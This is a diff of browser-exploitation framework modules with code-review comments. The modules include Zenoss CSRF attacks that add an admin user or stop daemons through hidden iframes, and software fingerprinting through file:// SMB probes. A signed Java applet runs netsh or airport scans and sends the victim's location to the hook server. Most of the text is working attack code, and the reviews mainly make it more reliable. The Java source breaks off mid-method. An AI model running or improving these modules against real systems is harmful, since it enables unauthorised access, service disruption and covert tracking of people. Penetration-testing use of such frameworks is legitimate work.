# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
get_visited_domains:
enable: true
category: "Browser"
name: "Get Visited Domains"
description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done at http://lcamtuf.coredump.cx/cachetime/"
authors: ["keith_lee @keith55 http://milo2012.wordpress.com"]
target:
working: ["FF","IE"]
not_working: ["O","C","S"]
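Review bot: the description "This module will retrieve rapid history extraction through non-destructive cache timing" does not parse as a sentence; say what the module does, for example "Detects which of a list of popular sites the browser has visited, using non-destructive cache timing" and keep the attribution link. `not_working: ["O","C","S"]` agrees with the Firefox/IE-only message in command.js, which is good.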

View File

@@ -13,23 +13,13 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Models
class DynamicPayloads
include DataMapper::Resource
storage_names[:default] = 'core_dynamicpayloads'
property :id, Serial
property :name, Text, :lazy => false
has n, :dynamic_payload_info
class Get_visited_domains < BeEF::Core::Command
def post_execute
content = {}
content['results'] = @datastore['results']
save content
end
end
end
end
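Review bot: as rendered, this hunk removes the `module BeEF` / `module Core` / `module Models` wrappers together with the DynamicPayloads model but keeps the three trailing `end` lines as context, while the new `class Get_visited_domains` body already closes both its `def post_execute` and the class; if the file really ends with two more `end`s it will not parse, so run `ruby -c` on it. Git has paired this module.rb with the old model file only because the license header matched; committing it as a new file would give a readable diff. `content['results'] = @datastore['results']` also lacks the nil guard used by the Unhook module (`... if not @datastore["result"].nil?`), so `save` is called with a nil value when the browser never reports.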

View File

@@ -19,7 +19,7 @@ beef.execute(function() {
$j('body').css({'padding':'0px', 'margin':'0px', 'height':'100%'});
$j('html').css({'padding':'0px', 'margin':'0px', 'height':'100%'});
$j('body').html('<object width="100%" height="100%"><param name="movie" value="http://www.youtube.com/v/XZ5TajZYW6Y?fs=1&amp;hl=en_US&amp;autoplay=1&amp;iv_load_policy=3"><param name="allowFullScreen" value="true"><param name="allowscriptaccess" value="always"><embed src="http://www.youtube.com/v/XZ5TajZYW6Y?fs=1&amp;hl=en_US&amp;autoplay=1&amp;iv_load_policy=3" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="100%" height="100%"></object>');
$j('body').html('<object width="100%" height="100%"><param name="movie" value="http://www.youtube.com/v/oHg5SJYRHA0?fs=1&amp;hl=en_US&amp;autoplay=1&amp;iv_load_policy=3"><param name="allowFullScreen" value="true"><param name="allowscriptaccess" value="always"><embed src="http://www.youtube.com/v/oHg5SJYRHA0?fs=1&amp;hl=en_US&amp;autoplay=1&amp;iv_load_policy=3" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="100%" height="100%"></object>');
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Rickroll Successful");
});
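Review bot: only the video id changes here, but the unchanged `beef.net.send(..., "result=Rickroll Successful")` fires immediately after the `.html()` assignment, so the result reports success whether or not the Flash object ever loads; "embed attempted" would be accurate. Both `<param name="allowscriptaccess" value="always">` and the `allowscriptaccess="always"` attribute grant the embedded SWF script access to the hosting page, which playback does not need; `sameDomain` is the conservative value.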

View File

@@ -0,0 +1,39 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent unhook request");
// remove script tag(s)
try {
var scripts = document.getElementsByTagName("script");
for (var i=0; i<scripts.length; i++) {
if (scripts[i].src.match(/https?:\/\/[^\/]+\/hook\.js/)) {
scripts[i].parentNode.removeChild(scripts[i]);
}
}
} catch (e) { }
// attempt to clean up DOM
try {
delete beef;
delete BEEFHOOK;
beef_init=null;
BeefJS=null;
} catch (e) { }
});
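Review bot: `delete beef;` and `delete BEEFHOOK;` only remove properties created by plain assignment; a binding created with `var` or a function declaration is non-configurable, so `delete` returns false and the surrounding try/catch hides that nothing happened (in strict mode the statements are a SyntaxError). Assign `null` as the `beef_init=null; BeefJS=null;` lines already do. The comment "// attempt to clean up DOM" is inaccurate for that block, which clears JavaScript globals; the DOM cleanup is the script-tag loop above it. The regex `/https?:\/\/[^\/]+\/hook\.js/` removes any origin's `/hook.js`; since the hook's own host is available as `beef.net.host`, match against that instead.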

View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
unhook:
enable: true
category: "Browser"
name: "Unhook"
description: "This module removes the BeEF hook from the hooked page."
authors: ["bcoles"]
target:
working: ["All"]
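Review bot: `working: ["All"]` uses a different case from the `working: ["ALL"]` in the Zenoss, CUPS and Google Desktop configs of this same change set; if the target matcher compares strings exactly, one spelling silently matches nothing. Pick one form and document it.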

View File

@@ -0,0 +1,24 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Unhook < BeEF::Core::Command
def post_execute
content = {}
content["result"] = @datastore["result"] if not @datastore["result"].nil?
save content
end
end
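Review bot: `content["result"] = @datastore["result"] if not @datastore["result"].nil?` is correct but `unless @datastore["result"].nil?` is the idiomatic form; also, when the guard fails `save content` still stores an empty hash, so either skip the save or record that no result was returned.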

View File

@@ -19,8 +19,7 @@ beef:
enable: true
category: "Exploits"
name: "Safari Launch App"
description: "Launch an application from the victim machine.<br/><br/>See CVE-2011-3230 for more details."
notes: "Safari <= 5.1 on OS X is vulnerable. Original discovery by Aaron Sigel. Also see CVE-2011-3230"
description: "Launch an application from the victim machine.<br/><br/>See CVE-2011-3230 for more details.<br /><br />Safari <= 5.1 on OS X is vulnerable. Original discovery by Aaron Sigel. Also see CVE-2011-3230"
authors: ["antisnatchor"]
target:
user_notify: ["S"]
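Review bot: folding `notes` into `description` leaves the same CVE cited twice in one string ("See CVE-2011-3230 for more details.<br /><br />Safari <= 5.1 on OS X is vulnerable. Original discovery by Aaron Sigel. Also see CVE-2011-3230"); drop the second "Also see" clause.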

View File

@@ -0,0 +1,33 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var base = '<%= @base %>';
var user_level = '<%= @user_level %>';
var username = '<%= @username %>';
var password = '<%= @password %>';
var zenoss_add_user_iframe = beef.dom.createInvisibleIframe();
zenoss_add_user_iframe.setAttribute('src', base+'/zport/dmd/ZenUsers?tableName=userlist&zenScreenName=manageUserFolder.pt&manage_addUser%3Amethod=OK&defaultAdminRole='+user_level+'&roles%3Alist='+user_level+'&userid='+username+'&password='+password);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(zenoss_add_user_iframe);
}
setTimeout("cleanup()", 15000);
});
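Review bot: `cleanup = function() {...}` is assigned without `var`, so it becomes a global on the hooked page, and `setTimeout("cleanup()", 15000)` hands a string to be evaluated; pass the function itself, `setTimeout(function() { document.body.removeChild(zenoss_add_user_iframe); }, 15000);`. The result string "exploit attempted" is the right wording, because nothing here can observe whether the request in the invisible iframe succeeded; keep it that way rather than reporting success.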

View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
zenoss_add_user_csrf:
enable: true
category: "Exploits"
name: "Zenoss Add User CSRF"
description: "Attempts to add a user to a Zenoss Core <= 3.2.1 server."
authors: ["bcoles"]
target:
working: ["ALL"]

View File

@@ -0,0 +1,46 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Zenoss_add_user_csrf < BeEF::Core::Command
def self.options
return [
{ 'name' => 'base', 'ui_label' => 'Zenoss web root', 'value' => 'http://192.168.1.1:8080/'},
{ 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'},
{ 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'},
{ 'name' => 'user_level',
'type' => 'combobox',
'ui_label' => 'User Level',
'store_type' => 'arraystore',
'store_fields' => ['user_level'],
'store_data' => [
['Manager'],
['ZenManager'],
['ZenUser']
],
'emptyText' => 'Select a user level ("Manager" is highest)',
'valueField' => 'user_level',
'displayField' => 'user_level',
'mode' => 'local',
'autoWidth' => true
},
]
end
def post_execute
save({'result' => @datastore['result']})
end
end
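Review bot: the default for `base` is `'http://192.168.1.1:8080/'` with a trailing slash, and command.js builds `base+'/zport/dmd/ZenUsers?...'`, so the default produces `http://192.168.1.1:8080//zport/...`; either drop the trailing slash from the default and say so in the `ui_label`, or normalise `base` before use. The trailing comma after the `user_level` hash (`},` before `]`) is legal Ruby but inconsistent with the other option lists in this set.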

View File

@@ -0,0 +1,32 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var base = '<%= @base %>';
var service = '<%= @service %>';
var action = '<%= @action %>';
var zenoss_daemon_iframe = beef.dom.createInvisibleIframe();
zenoss_daemon_iframe.setAttribute('src', base+'/zport/About?action='+action+'&daemon='+service+'&manage_daemonAction%3Amethod='+action);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(zenoss_daemon_iframe);
}
setTimeout("cleanup()", 15000);
});
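Review bot: same two points as the add-user command.js: `cleanup` leaks as an implicit global and `setTimeout("cleanup()", 15000)` evaluates a string; use `setTimeout(function() {...}, 15000)`. `action` is sent twice, as `?action=` and as `manage_daemonAction%3Amethod=`; if the Zenoss form needs both, a one-line comment saying so will stop the next reader from "simplifying" it.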

View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
zenoss_daemon_csrf:
enable: true
category: "Exploits"
name: "Zenoss Daemon CSRF"
description: "Attempts to start/stop/restart daemons on a Zenoss Core <= 3.2.1 server."
authors: ["bcoles"]
target:
working: ["ALL"]

View File

@@ -0,0 +1,70 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Zenoss_daemon_csrf < BeEF::Core::Command
def self.options
return [
{ 'name' => 'base', 'ui_label' => 'Zenoss web root', 'value' => 'http://192.168.1.1:8080/'},
{ 'name' => 'service',
'type' => 'combobox',
'ui_label' => 'Daemon',
'store_type' => 'arraystore',
'store_fields' => ['service', 'description'],
'store_data' => [
['zeoctl', 'zeoctl (Zope Enterprise Objects server - shares database between Zope instances)'],
['zopectl', 'zopectl (The Zope open source web application server)'],
['zenhub', 'zenhub (Broker between the data layer and the collection daemons)'],
['zenjobs', 'zenjobs (Zenjobs)'],
['zenping', 'zenping (ICMP ping status monitoring)'],
['zensyslog', 'zensyslog (Collection of and classification of syslog events)'],
['zenstatus', 'zenstatus (Active TCP connection testing of remote daemons)'],
['zenactions', 'zenactions (Alerts - SMTP, SNPP and Maintenance Windows)'],
['zentrap', 'zentrap (Receives SNMP traps and turns them into events)'],
['zenmodeler', 'zenmodeler (Configuration collection and configuration)'],
['zenperfsnmp', 'zenperfsnmp (High performance asynchronous SNMP performance collection)'],
['zencommand', 'zencommand (Runs plug-ins on the local box or on remote boxes through SSH)'],
['zenprocess', 'zenprocess (Process monitoring using SNMP host resources MIB)'],
['zenwin', 'zenwin (Windows Service Monitoring (WMI))'],
['zeneventlog', 'zeneventlog (Collect (WMI) event log events (aka NT Eventlog))'],
['zenjmx', 'zenjmx (ZenJMX)']
],
'emptyText' => 'Select a daemon',
'valueField' => 'service',
'displayField' => 'service', #'description',
'mode' => 'local',
'autoWidth' => true
},
{ 'name' => 'action',
'type' => 'combobox',
'ui_label' => 'Action',
'store_type' => 'arraystore',
'store_fields' => ['action'],
'store_data' => [
['Start'],['Stop'],['Restart']
],
'valueField' => 'action',
'displayField' => 'action',
'mode' => 'local',
'autoWidth' => true
}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end
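Review bot: `'displayField' => 'service', #'description',` leaves a commented-out alternative in the code and means the second `store_fields` column (`description`) is loaded into the store but never shown; either display `description` or drop the column and the long description strings. `['zenmodeler', 'zenmodeler (Configuration collection and configuration)']` looks like a copy error. The `base` default has the same trailing-slash problem as the add-user module: `'http://192.168.1.1:8080/'` plus `'/zport/About?...'` gives a double slash.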

View File

@@ -22,4 +22,9 @@ beef:
description: "This module attempts to detect Common UNIX Printing System (CUPS) on localhost on the default port 631."
authors: ["bcoles"]
target:
working: ["ALL"]
working:
ALL:
os: ["Linux"]
not_working:
ALL:
os: ["All"]
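Review bot: the new `target` block declares `working: ALL: os: ["Linux"]` and `not_working: ALL: os: ["All"]` at the same time; "All" operating systems includes Linux, so which rule wins depends on evaluation order inside the target matcher. If the intent is "works on Linux, not elsewhere", the `not_working` entry is either redundant or should name the other operating systems.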

View File

@@ -22,4 +22,7 @@ beef:
description: "This module attempts to detect Google Desktop running on the default port 4664."
authors: ["bcoles"]
target:
not_working:
ALL:
os: ["iPhone"]
working: ["ALL"]

View File

@@ -19,8 +19,7 @@ beef:
enable: true
category: "Host"
name: "Get Protocol Handlers"
description: "This module attempts to identify protocol handlers present on the hooked browser."
notes: "Only Internet Explorer and Firefox are supported.<br /><br />Firefox users are prompted to launch the application for which the protocol handler is responsible.<br /><br />Firefox users are warned when there is no application assigned to a protocol handler.<br /><br /><br /><br />The possible return values are: unknown, exists, does not exist"
description: "This module attempts to identify protocol handlers present on the hooked browser. Only Internet Explorer and Firefox are supported.<br /><br />Firefox users are prompted to launch the application for which the protocol handler is responsible.<br /><br />Firefox users are warned when there is no application assigned to a protocol handler.<br /><br /><br /><br />The possible return values are: unknown, exists, does not exist."
authors: ["bcoles"]
target:
working: ["IE"]
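Review bot: the merged description says "Only Internet Explorer and Firefox are supported", but `target: working: ["IE"]` lists only IE; add FF to `working` (or to `user_notify`, since the text says Firefox prompts the user) so the UI and the description agree. The `<br /><br /><br /><br />` run before "The possible return values" is leftover from the old `notes` field; two are enough.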

View File

@@ -0,0 +1,159 @@
//
// detect software
//
beef.execute(function() {
var files = [
"Adobe/Reader 9.0/Reader/Tracker/add_reviewer.gif",
"NetWaiting/Logon.bmp",
"Windows NT/Pinball/table.bmp",
"InterVideo/WinDVD/Skins/WinDVD 5/Audio SRS Subpanel/Audio_SRS_Subpanel_Base_Mask.bmp",
"Java/jre1.6.0_02/lib/images/cursors/invalid32x32.gif",
"Common Files/Roxio Shared/9.0/Tutorial/Graphics/archive.gif",
"Windows Sidebar/Gadgets/Weather.Gadget/images/1px.gif",
"Pinnacle/Shared Files/Pixie/Register/hdr_register_1.gif",
"Adobe/Reader 8.0/Reader/BeyondReader/ENU/Onramp/acrobat.gif",
"eFax Messenger 4.3/Media/ENU/confidential.gif",
"InterActual/InterActual Player/help/images/btm_bckg.gif",
"Intuit/QuickBooks 2007/Components/Help/Updates/bolt.gif",
"Java/jre1.5.0_11/lib/images/cursors/win32_CopyDrop32x32.gif",
"Macromedia/Flash 8/en/First Run/HelpPanel/_sharedassets/check.gif",
"Microsoft Dynamics CRM/Client/res/web/_imgs/configure.gif",
"Microsoft Office/Live Meeting 8/Console/Playback/Engine/img/dropdown-arrow.gif",
"Microsoft Visual Studio 8/Common7/IDE/VBExpress/ProjectTemplatesCache/1033/MovieCollection.zip/Documentation/images/side-vb.gif",
"Mozilla Firefox/res/broken-image.gif",
"Mozilla Thunderbird/res/grabber.gif",
"TechSmith/SnagIt 9/HTML_Content/add-in.gif",
"VMware/VMware Player/help/images/collapse.gif",
"WildPackets/OmniPeek Personal/1033/Html/expert-red-yellow-on.gif",
"FreeMind/accessories/hide.png",
"HP/Digital Imaging/Skins/oov1/bc/img/bc-backLogo.png",
"Movie Maker/Shared/news.png",
"MySQL/MySQL Tools for 5.0/images/grt/db/column.png",
"Safari/Safari.resources/compass.png",
"ThinkVantage Fingerprint Software/rsc/logon.png",
"Trillian/plugins/GoodNews/icons/logo.png",
"Trillian/users/default/cache/account-AIM-offline.png",
"VideoLAN/VLC/http/images/delete.png",
"Virtual Earth 3D/Data/Atmosphere.png",
"Windows Media Connect 2/wmc_bw120.png",
"Analog Devices/SoundMAX/CPApp.ico",
"AT&T/Communication Manager/desktop.ico",
"ATI Technologies/ATI.ACE/branding.ico",
"Canon/ZoomBrowser EX/Program/CIGLibDisplayIcon.ico",
"CDBurnerXP Pro 3/Resources/cdbxp.ico",
"DivX/divxdotcom.ico",
"Fiddler/IE_Toolbar.ico",
"HP/SwfScan/SwfScan.ico",
"iPhone Configuration Utility/Document-Config.ico",
"Microsoft Device Emulator/1.0/emulator.ico",
"MSN/MSNCoreFiles/Install/msnms.ico",
"OpenVPN/openvpn.ico",
"Paros/paros_logo.ico",
"Adobe/Photoshop 6.0/Help/images/banner.jpg",
"iTunes/iTunes.Resources/genre-blues.jpg",
"Source Insight 3/images/SubBack.jpg",
"Canon/CameraWindow/MyCameraFiles/VI_JPG/XMAS22_VI01.JPG",
"Microsoft Office/OFFICE11/REFBAR.ICO",
"Microsoft Office/OFFICE12/REFBAR.ICO",
"Windows Media Player/Network Sharing/wmpnss_color48.jpg",
]
var descriptions = [
"Adobe Reader 9.0",
"WinDVD",
"Windows Pinball",
"Conexant NetWaiting",
"JRE 1.6.0_22",
"Roxio 9.0",
"Windows Weather Gadget",
"Pinnacle",
"Adobe Reader 8.0",
"eFax Manager 4.0",
"Interactual Player",
"Quickbooks",
"JRE 1.5.0_11",
"Flash 8",
"Microsoft CRM",
"Microsoft Live Meeting 8",
"Microsoft Visual Studio 8",
"Mozilla Firefox",
"Mozilla Thunderbird",
"Snagit 9",
"VMware Player",
"Omnipeek Personal",
"Freemind",
"HP Digital Imaging",
"Windows Movie Maker",
"MySQL Tools for 5.0",
"Safari",
"ThinkVantage Fingerprint Software",
"Trillian Plugin GoodNews",
"Trillian",
"VideoLAN VLC",
"Microsoft Virtial Earth 3D",
"Windows Media Connect 2",
"SoundMAX",
"AT&T Communications Manager",
"ATI Technologies ATI.ACE",
"Canon ZoomBrowser",
"CDBurnerXP Pro 3",
"DivX",
"Fiddler",
"HP's SwfScan",
"iPhone Configuration Utility",
"Microsoft Device Emulator",
"MSN",
"OpenVPN",
"Paros",
"Adobe Photoshop 6.0",
"iTunes",
"Source Insight 3",
"Canon CameraWindow",
"Microsoft Office 11",
"Microsoft Office 12",
"Windows Media Player"
]
if (navigator.appName != "Microsoft Internet Explorer") {
result = 'Software detection module only works in IE (so far)';
beef.net.send("<%= @command_url %>", <%= @command_id %>, "detect_software="+result);
// Using IE lets test for smb enum
} else {
var pic1 = new Image();
pic1.src= "file:///\\127.0.0.1/C$/WINDOWS/system32/ntimage.gif";
var pic2 = new Image();
pic2.src= "file:///\\127.0.0.1/C$/Windows/Web/Wallpaper/img1.jpg";
if (pic1.width == 28 && pic2.width == 28) {
result = 'SMB method of detecting software failed';
beef.net.send("<%= @command_url %>", <%= @command_id %>, "detect_software="+result);
// smb enum is working lets look for installed software
} else {
result = '';
var sixtyfourbitvista = 0;
for (var x = 0; x < files.length; x++) {
var pic1 = new Image();
pic1.src= "file:///\\127.0.0.1/C$/Program Files/" + files[x];
if (pic1.width != 28) {
result += descriptions[x];
result += ' and ';
} else {
pic1.src= "file:///\\127.0.0.1/C$/Program Files (x86)/" + files[x];
if (pic1.width != 28) {
result += descriptions[x];
result += ' and ';
sixtyfourbitvista = 1;
}
}
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, "detect_software="+result);
}
}
});
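Review bot: `files` and `descriptions` are parallel arrays indexed by the same `x`, and they are already out of step: `files[1]` is "NetWaiting/Logon.bmp" but `descriptions[1]` is "WinDVD", while `files[3]` (WinDVD) is labelled "Conexant NetWaiting"; "Java/jre1.6.0_02" is labelled "JRE 1.6.0_22" and "eFax Messenger 4.3" is labelled "eFax Manager 4.0" ("Virtial Earth" is also a typo). Put each path and its label in one object so they cannot drift. `pic1.width` is read on the line after `pic1.src = ...` is assigned, but image loading is asynchronous, so the 28-pixel broken-image comparison runs before the load completes and the outcome depends on timing; do the comparison in an onload/onerror handler. `result` is an implicit global, the trailing `' and '` is never trimmed, `sixtyfourbitvista` is set but never reported, and "AT&T Communications Manager" puts a raw `&` into the `detect_software=` body, which truncates the value unless `beef.net.send` encodes it.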

View File

@@ -0,0 +1,13 @@
# detect software
#
beef:
module:
Detect_software:
enable: true
category: "Host"
name: "Detect Software"
description: "Detects software installed on the host (Internet Explorer only)"
authors: ["mh"]
target:
working: ["IE"]
not_working: ["All"]
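Review bot: `working: ["IE"]` and `not_working: ["All"]` contradict each other, since "All" includes IE; drop the `not_working` entry or list the excluded browsers. The module key `Detect_software` is capitalised, unlike `unhook`, `zenoss_add_user_csrf` and the other keys in this set, and the file opens with a two-line `# detect software` comment where every other new config.yaml carries the Apache license header.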

View File

@@ -0,0 +1,12 @@
# detect software
#
class Detect_software < BeEF::Core::Command
def post_execute
content = {}
content['detect_software'] = @datastore['detect_software']
save content
end
end
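Review bot: `content['detect_software'] = @datastore['detect_software']` has no nil guard, so `save` stores a nil value when the browser never reports; mirror the `if not ... .nil?` check from the Unhook module. The file also lacks the license header the other new module.rb files carry.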

View File

@@ -0,0 +1,30 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/getGPSLocation.jar';
var applet_id = '<%= @applet_id %>';
var applet_name = '<%= @applet_name %>';
var output;
beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'getGPSLocation' ,
null, applet_archive, null);
output = document.Microsoft_Corporation.getInfo();
if (output) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'location_info='+output);
}
beef.dom.detachApplet('getGPSLocation');
});
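Review bot: `document.Microsoft_Corporation.getInfo()` is called on the line after `beef.dom.attachApplet(...)`, but the applet's `init()` (which runs `netsh` or the Mac equivalent and fills `result`) runs asynchronously, so unless attachApplet blocks until the applet has initialised, `output` will be the initial "" and the `if (output)` guard silently sends nothing; poll `getInfo()` with a timeout or have the applet call back into the page. `applet_id` and `applet_name` are read from the options but the literals 'Microsoft_Corporation' and 'getGPSLocation' are used in attachApplet, in `document.Microsoft_Corporation` and in `detachApplet('getGPSLocation')`, so changing the options has no effect; use the variables or remove them.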

View File

@@ -0,0 +1,26 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
get_physical_location:
enable: true
category: "Host"
name: "Get Physical Location"
description: "This module will retrieve geolocation information based on the neighboring wireless access points using commands encapsulated within a signed Java Applet. <br/><br/>The details will include:<br/> <ul><li> - GPS Coordinates details</li><li> - Street Address details</li></ul><br/><br/> If the victim machine has a firewall that monitors outgoing connections (Zonealaram, LittleSnitch, ..), calls to Google maps will be alerted."
authors: ["keith_lee @keith55 http://milo2012.wordpress.com", "antisnatchor"]
target:
working: ["IE"]
user_notify: ["C", "S", "O", "FF"]
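Review bot: the `description` string has spelling errors in product names (`Zonealaram` should be `ZoneAlarm`, `LittleSnitch` is `Little Snitch`) and the `<ul><li> - ...</li>` items render both a bullet and a literal dash, so the ` - ` prefixes should go. The `target` block lists only `working: ["IE"]` while the applet itself has Windows and Mac code paths and nothing else; a `not_working` entry for the excluded operating systems, in the form the other module configs in this diff use, would keep the browser tree accurate.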

@@ -0,0 +1,178 @@
import java.io.*;
import java.util.*;
import java.net.*;
import java.applet.*;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
// Keith Lee
// Twitter: @keith55
// http://milo2012.wordpress.com
// keith.lee2012[at]gmail.com
public class getGPSLocation extends Applet{
public static String result = "";
public getGPSLocation(){
super();
return;
}
public static String getInfo() {
return result;
}
public void init() {
if (isWindows()) {
result=getWindows();
} else if (isMac()) {
result=getMac();
} else {
//System.out.println("Your OS is not support!!");
}
}
public static String getWindows(){
try {
ArrayList ssidList = new ArrayList();
ArrayList bssidList = new ArrayList();
ArrayList rssiList = new ArrayList();
Process p = Runtime.getRuntime().exec("netsh wlan show networks mode=bssid");
BufferedReader in = new BufferedReader(
new InputStreamReader(p.getInputStream()));
String line = null;
String signal = null;
String ssidStr = null;
while ((line = in.readLine()) != null) {
Pattern p1 = Pattern.compile("(SSID\\s\\d+\\s:)\\s([\\w\\s]*)");
Matcher m1 = p1.matcher(line);
if(m1.find()){
ssidStr = m1.group(2);
ssidStr = ssidStr.replaceAll(" ","%20");
ssidList.add(ssidStr);
}
Pattern p2 = Pattern.compile("(BSSID\\s1\\s*:)\\s((.?)*)");
Matcher m2 = p2.matcher(line);
if(m2.find()){
bssidList.add(m2.group(2));
}
Pattern p3 = Pattern.compile("(Signal\\s*):\\s((.?)*)");
Matcher m3 = p3.matcher(line);
if(m3.find()){
signal = m3.group(2);
signal = signal.replaceAll("%","");
signal = signal.replaceAll(" ","");
signal = "-"+signal;
rssiList.add(signal);
}
}
int arraySize=ssidList.size();
if(arraySize==0){
result="\nI don't know where the target is";
}
else{
result=googleLookup(bssidList,ssidList,rssiList);
}
} catch (Exception e) {
System.out.println(e.getMessage());
}
return result;
}
public static String googleLookup(ArrayList bssidList,ArrayList ssidList,ArrayList rssiList){
String queryString = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true";
try {
int j=0;
while(j<ssidList.size()){
queryString+="&wifi=mac:";
queryString+=bssidList.get(j);
queryString+="%7C";
queryString+="ssid:";
queryString+=ssidList.get(j);
queryString+="%7C";
queryString+="ss:";
queryString+=rssiList.get(j);
j++;
}
} catch (Exception e) {
System.out.println(e.getMessage());
}
return queryString;
}
public static String getMac(){
try {
Process p = Runtime.getRuntime().exec("/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport scan");
BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line = null;
String ssidStr = null;
String signal = null;
String queryString = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true";
ArrayList ssidList = new ArrayList();
ArrayList bssidList = new ArrayList();
ArrayList rssiList = new ArrayList();
line = in.readLine();
while ((line = in.readLine()) != null) {
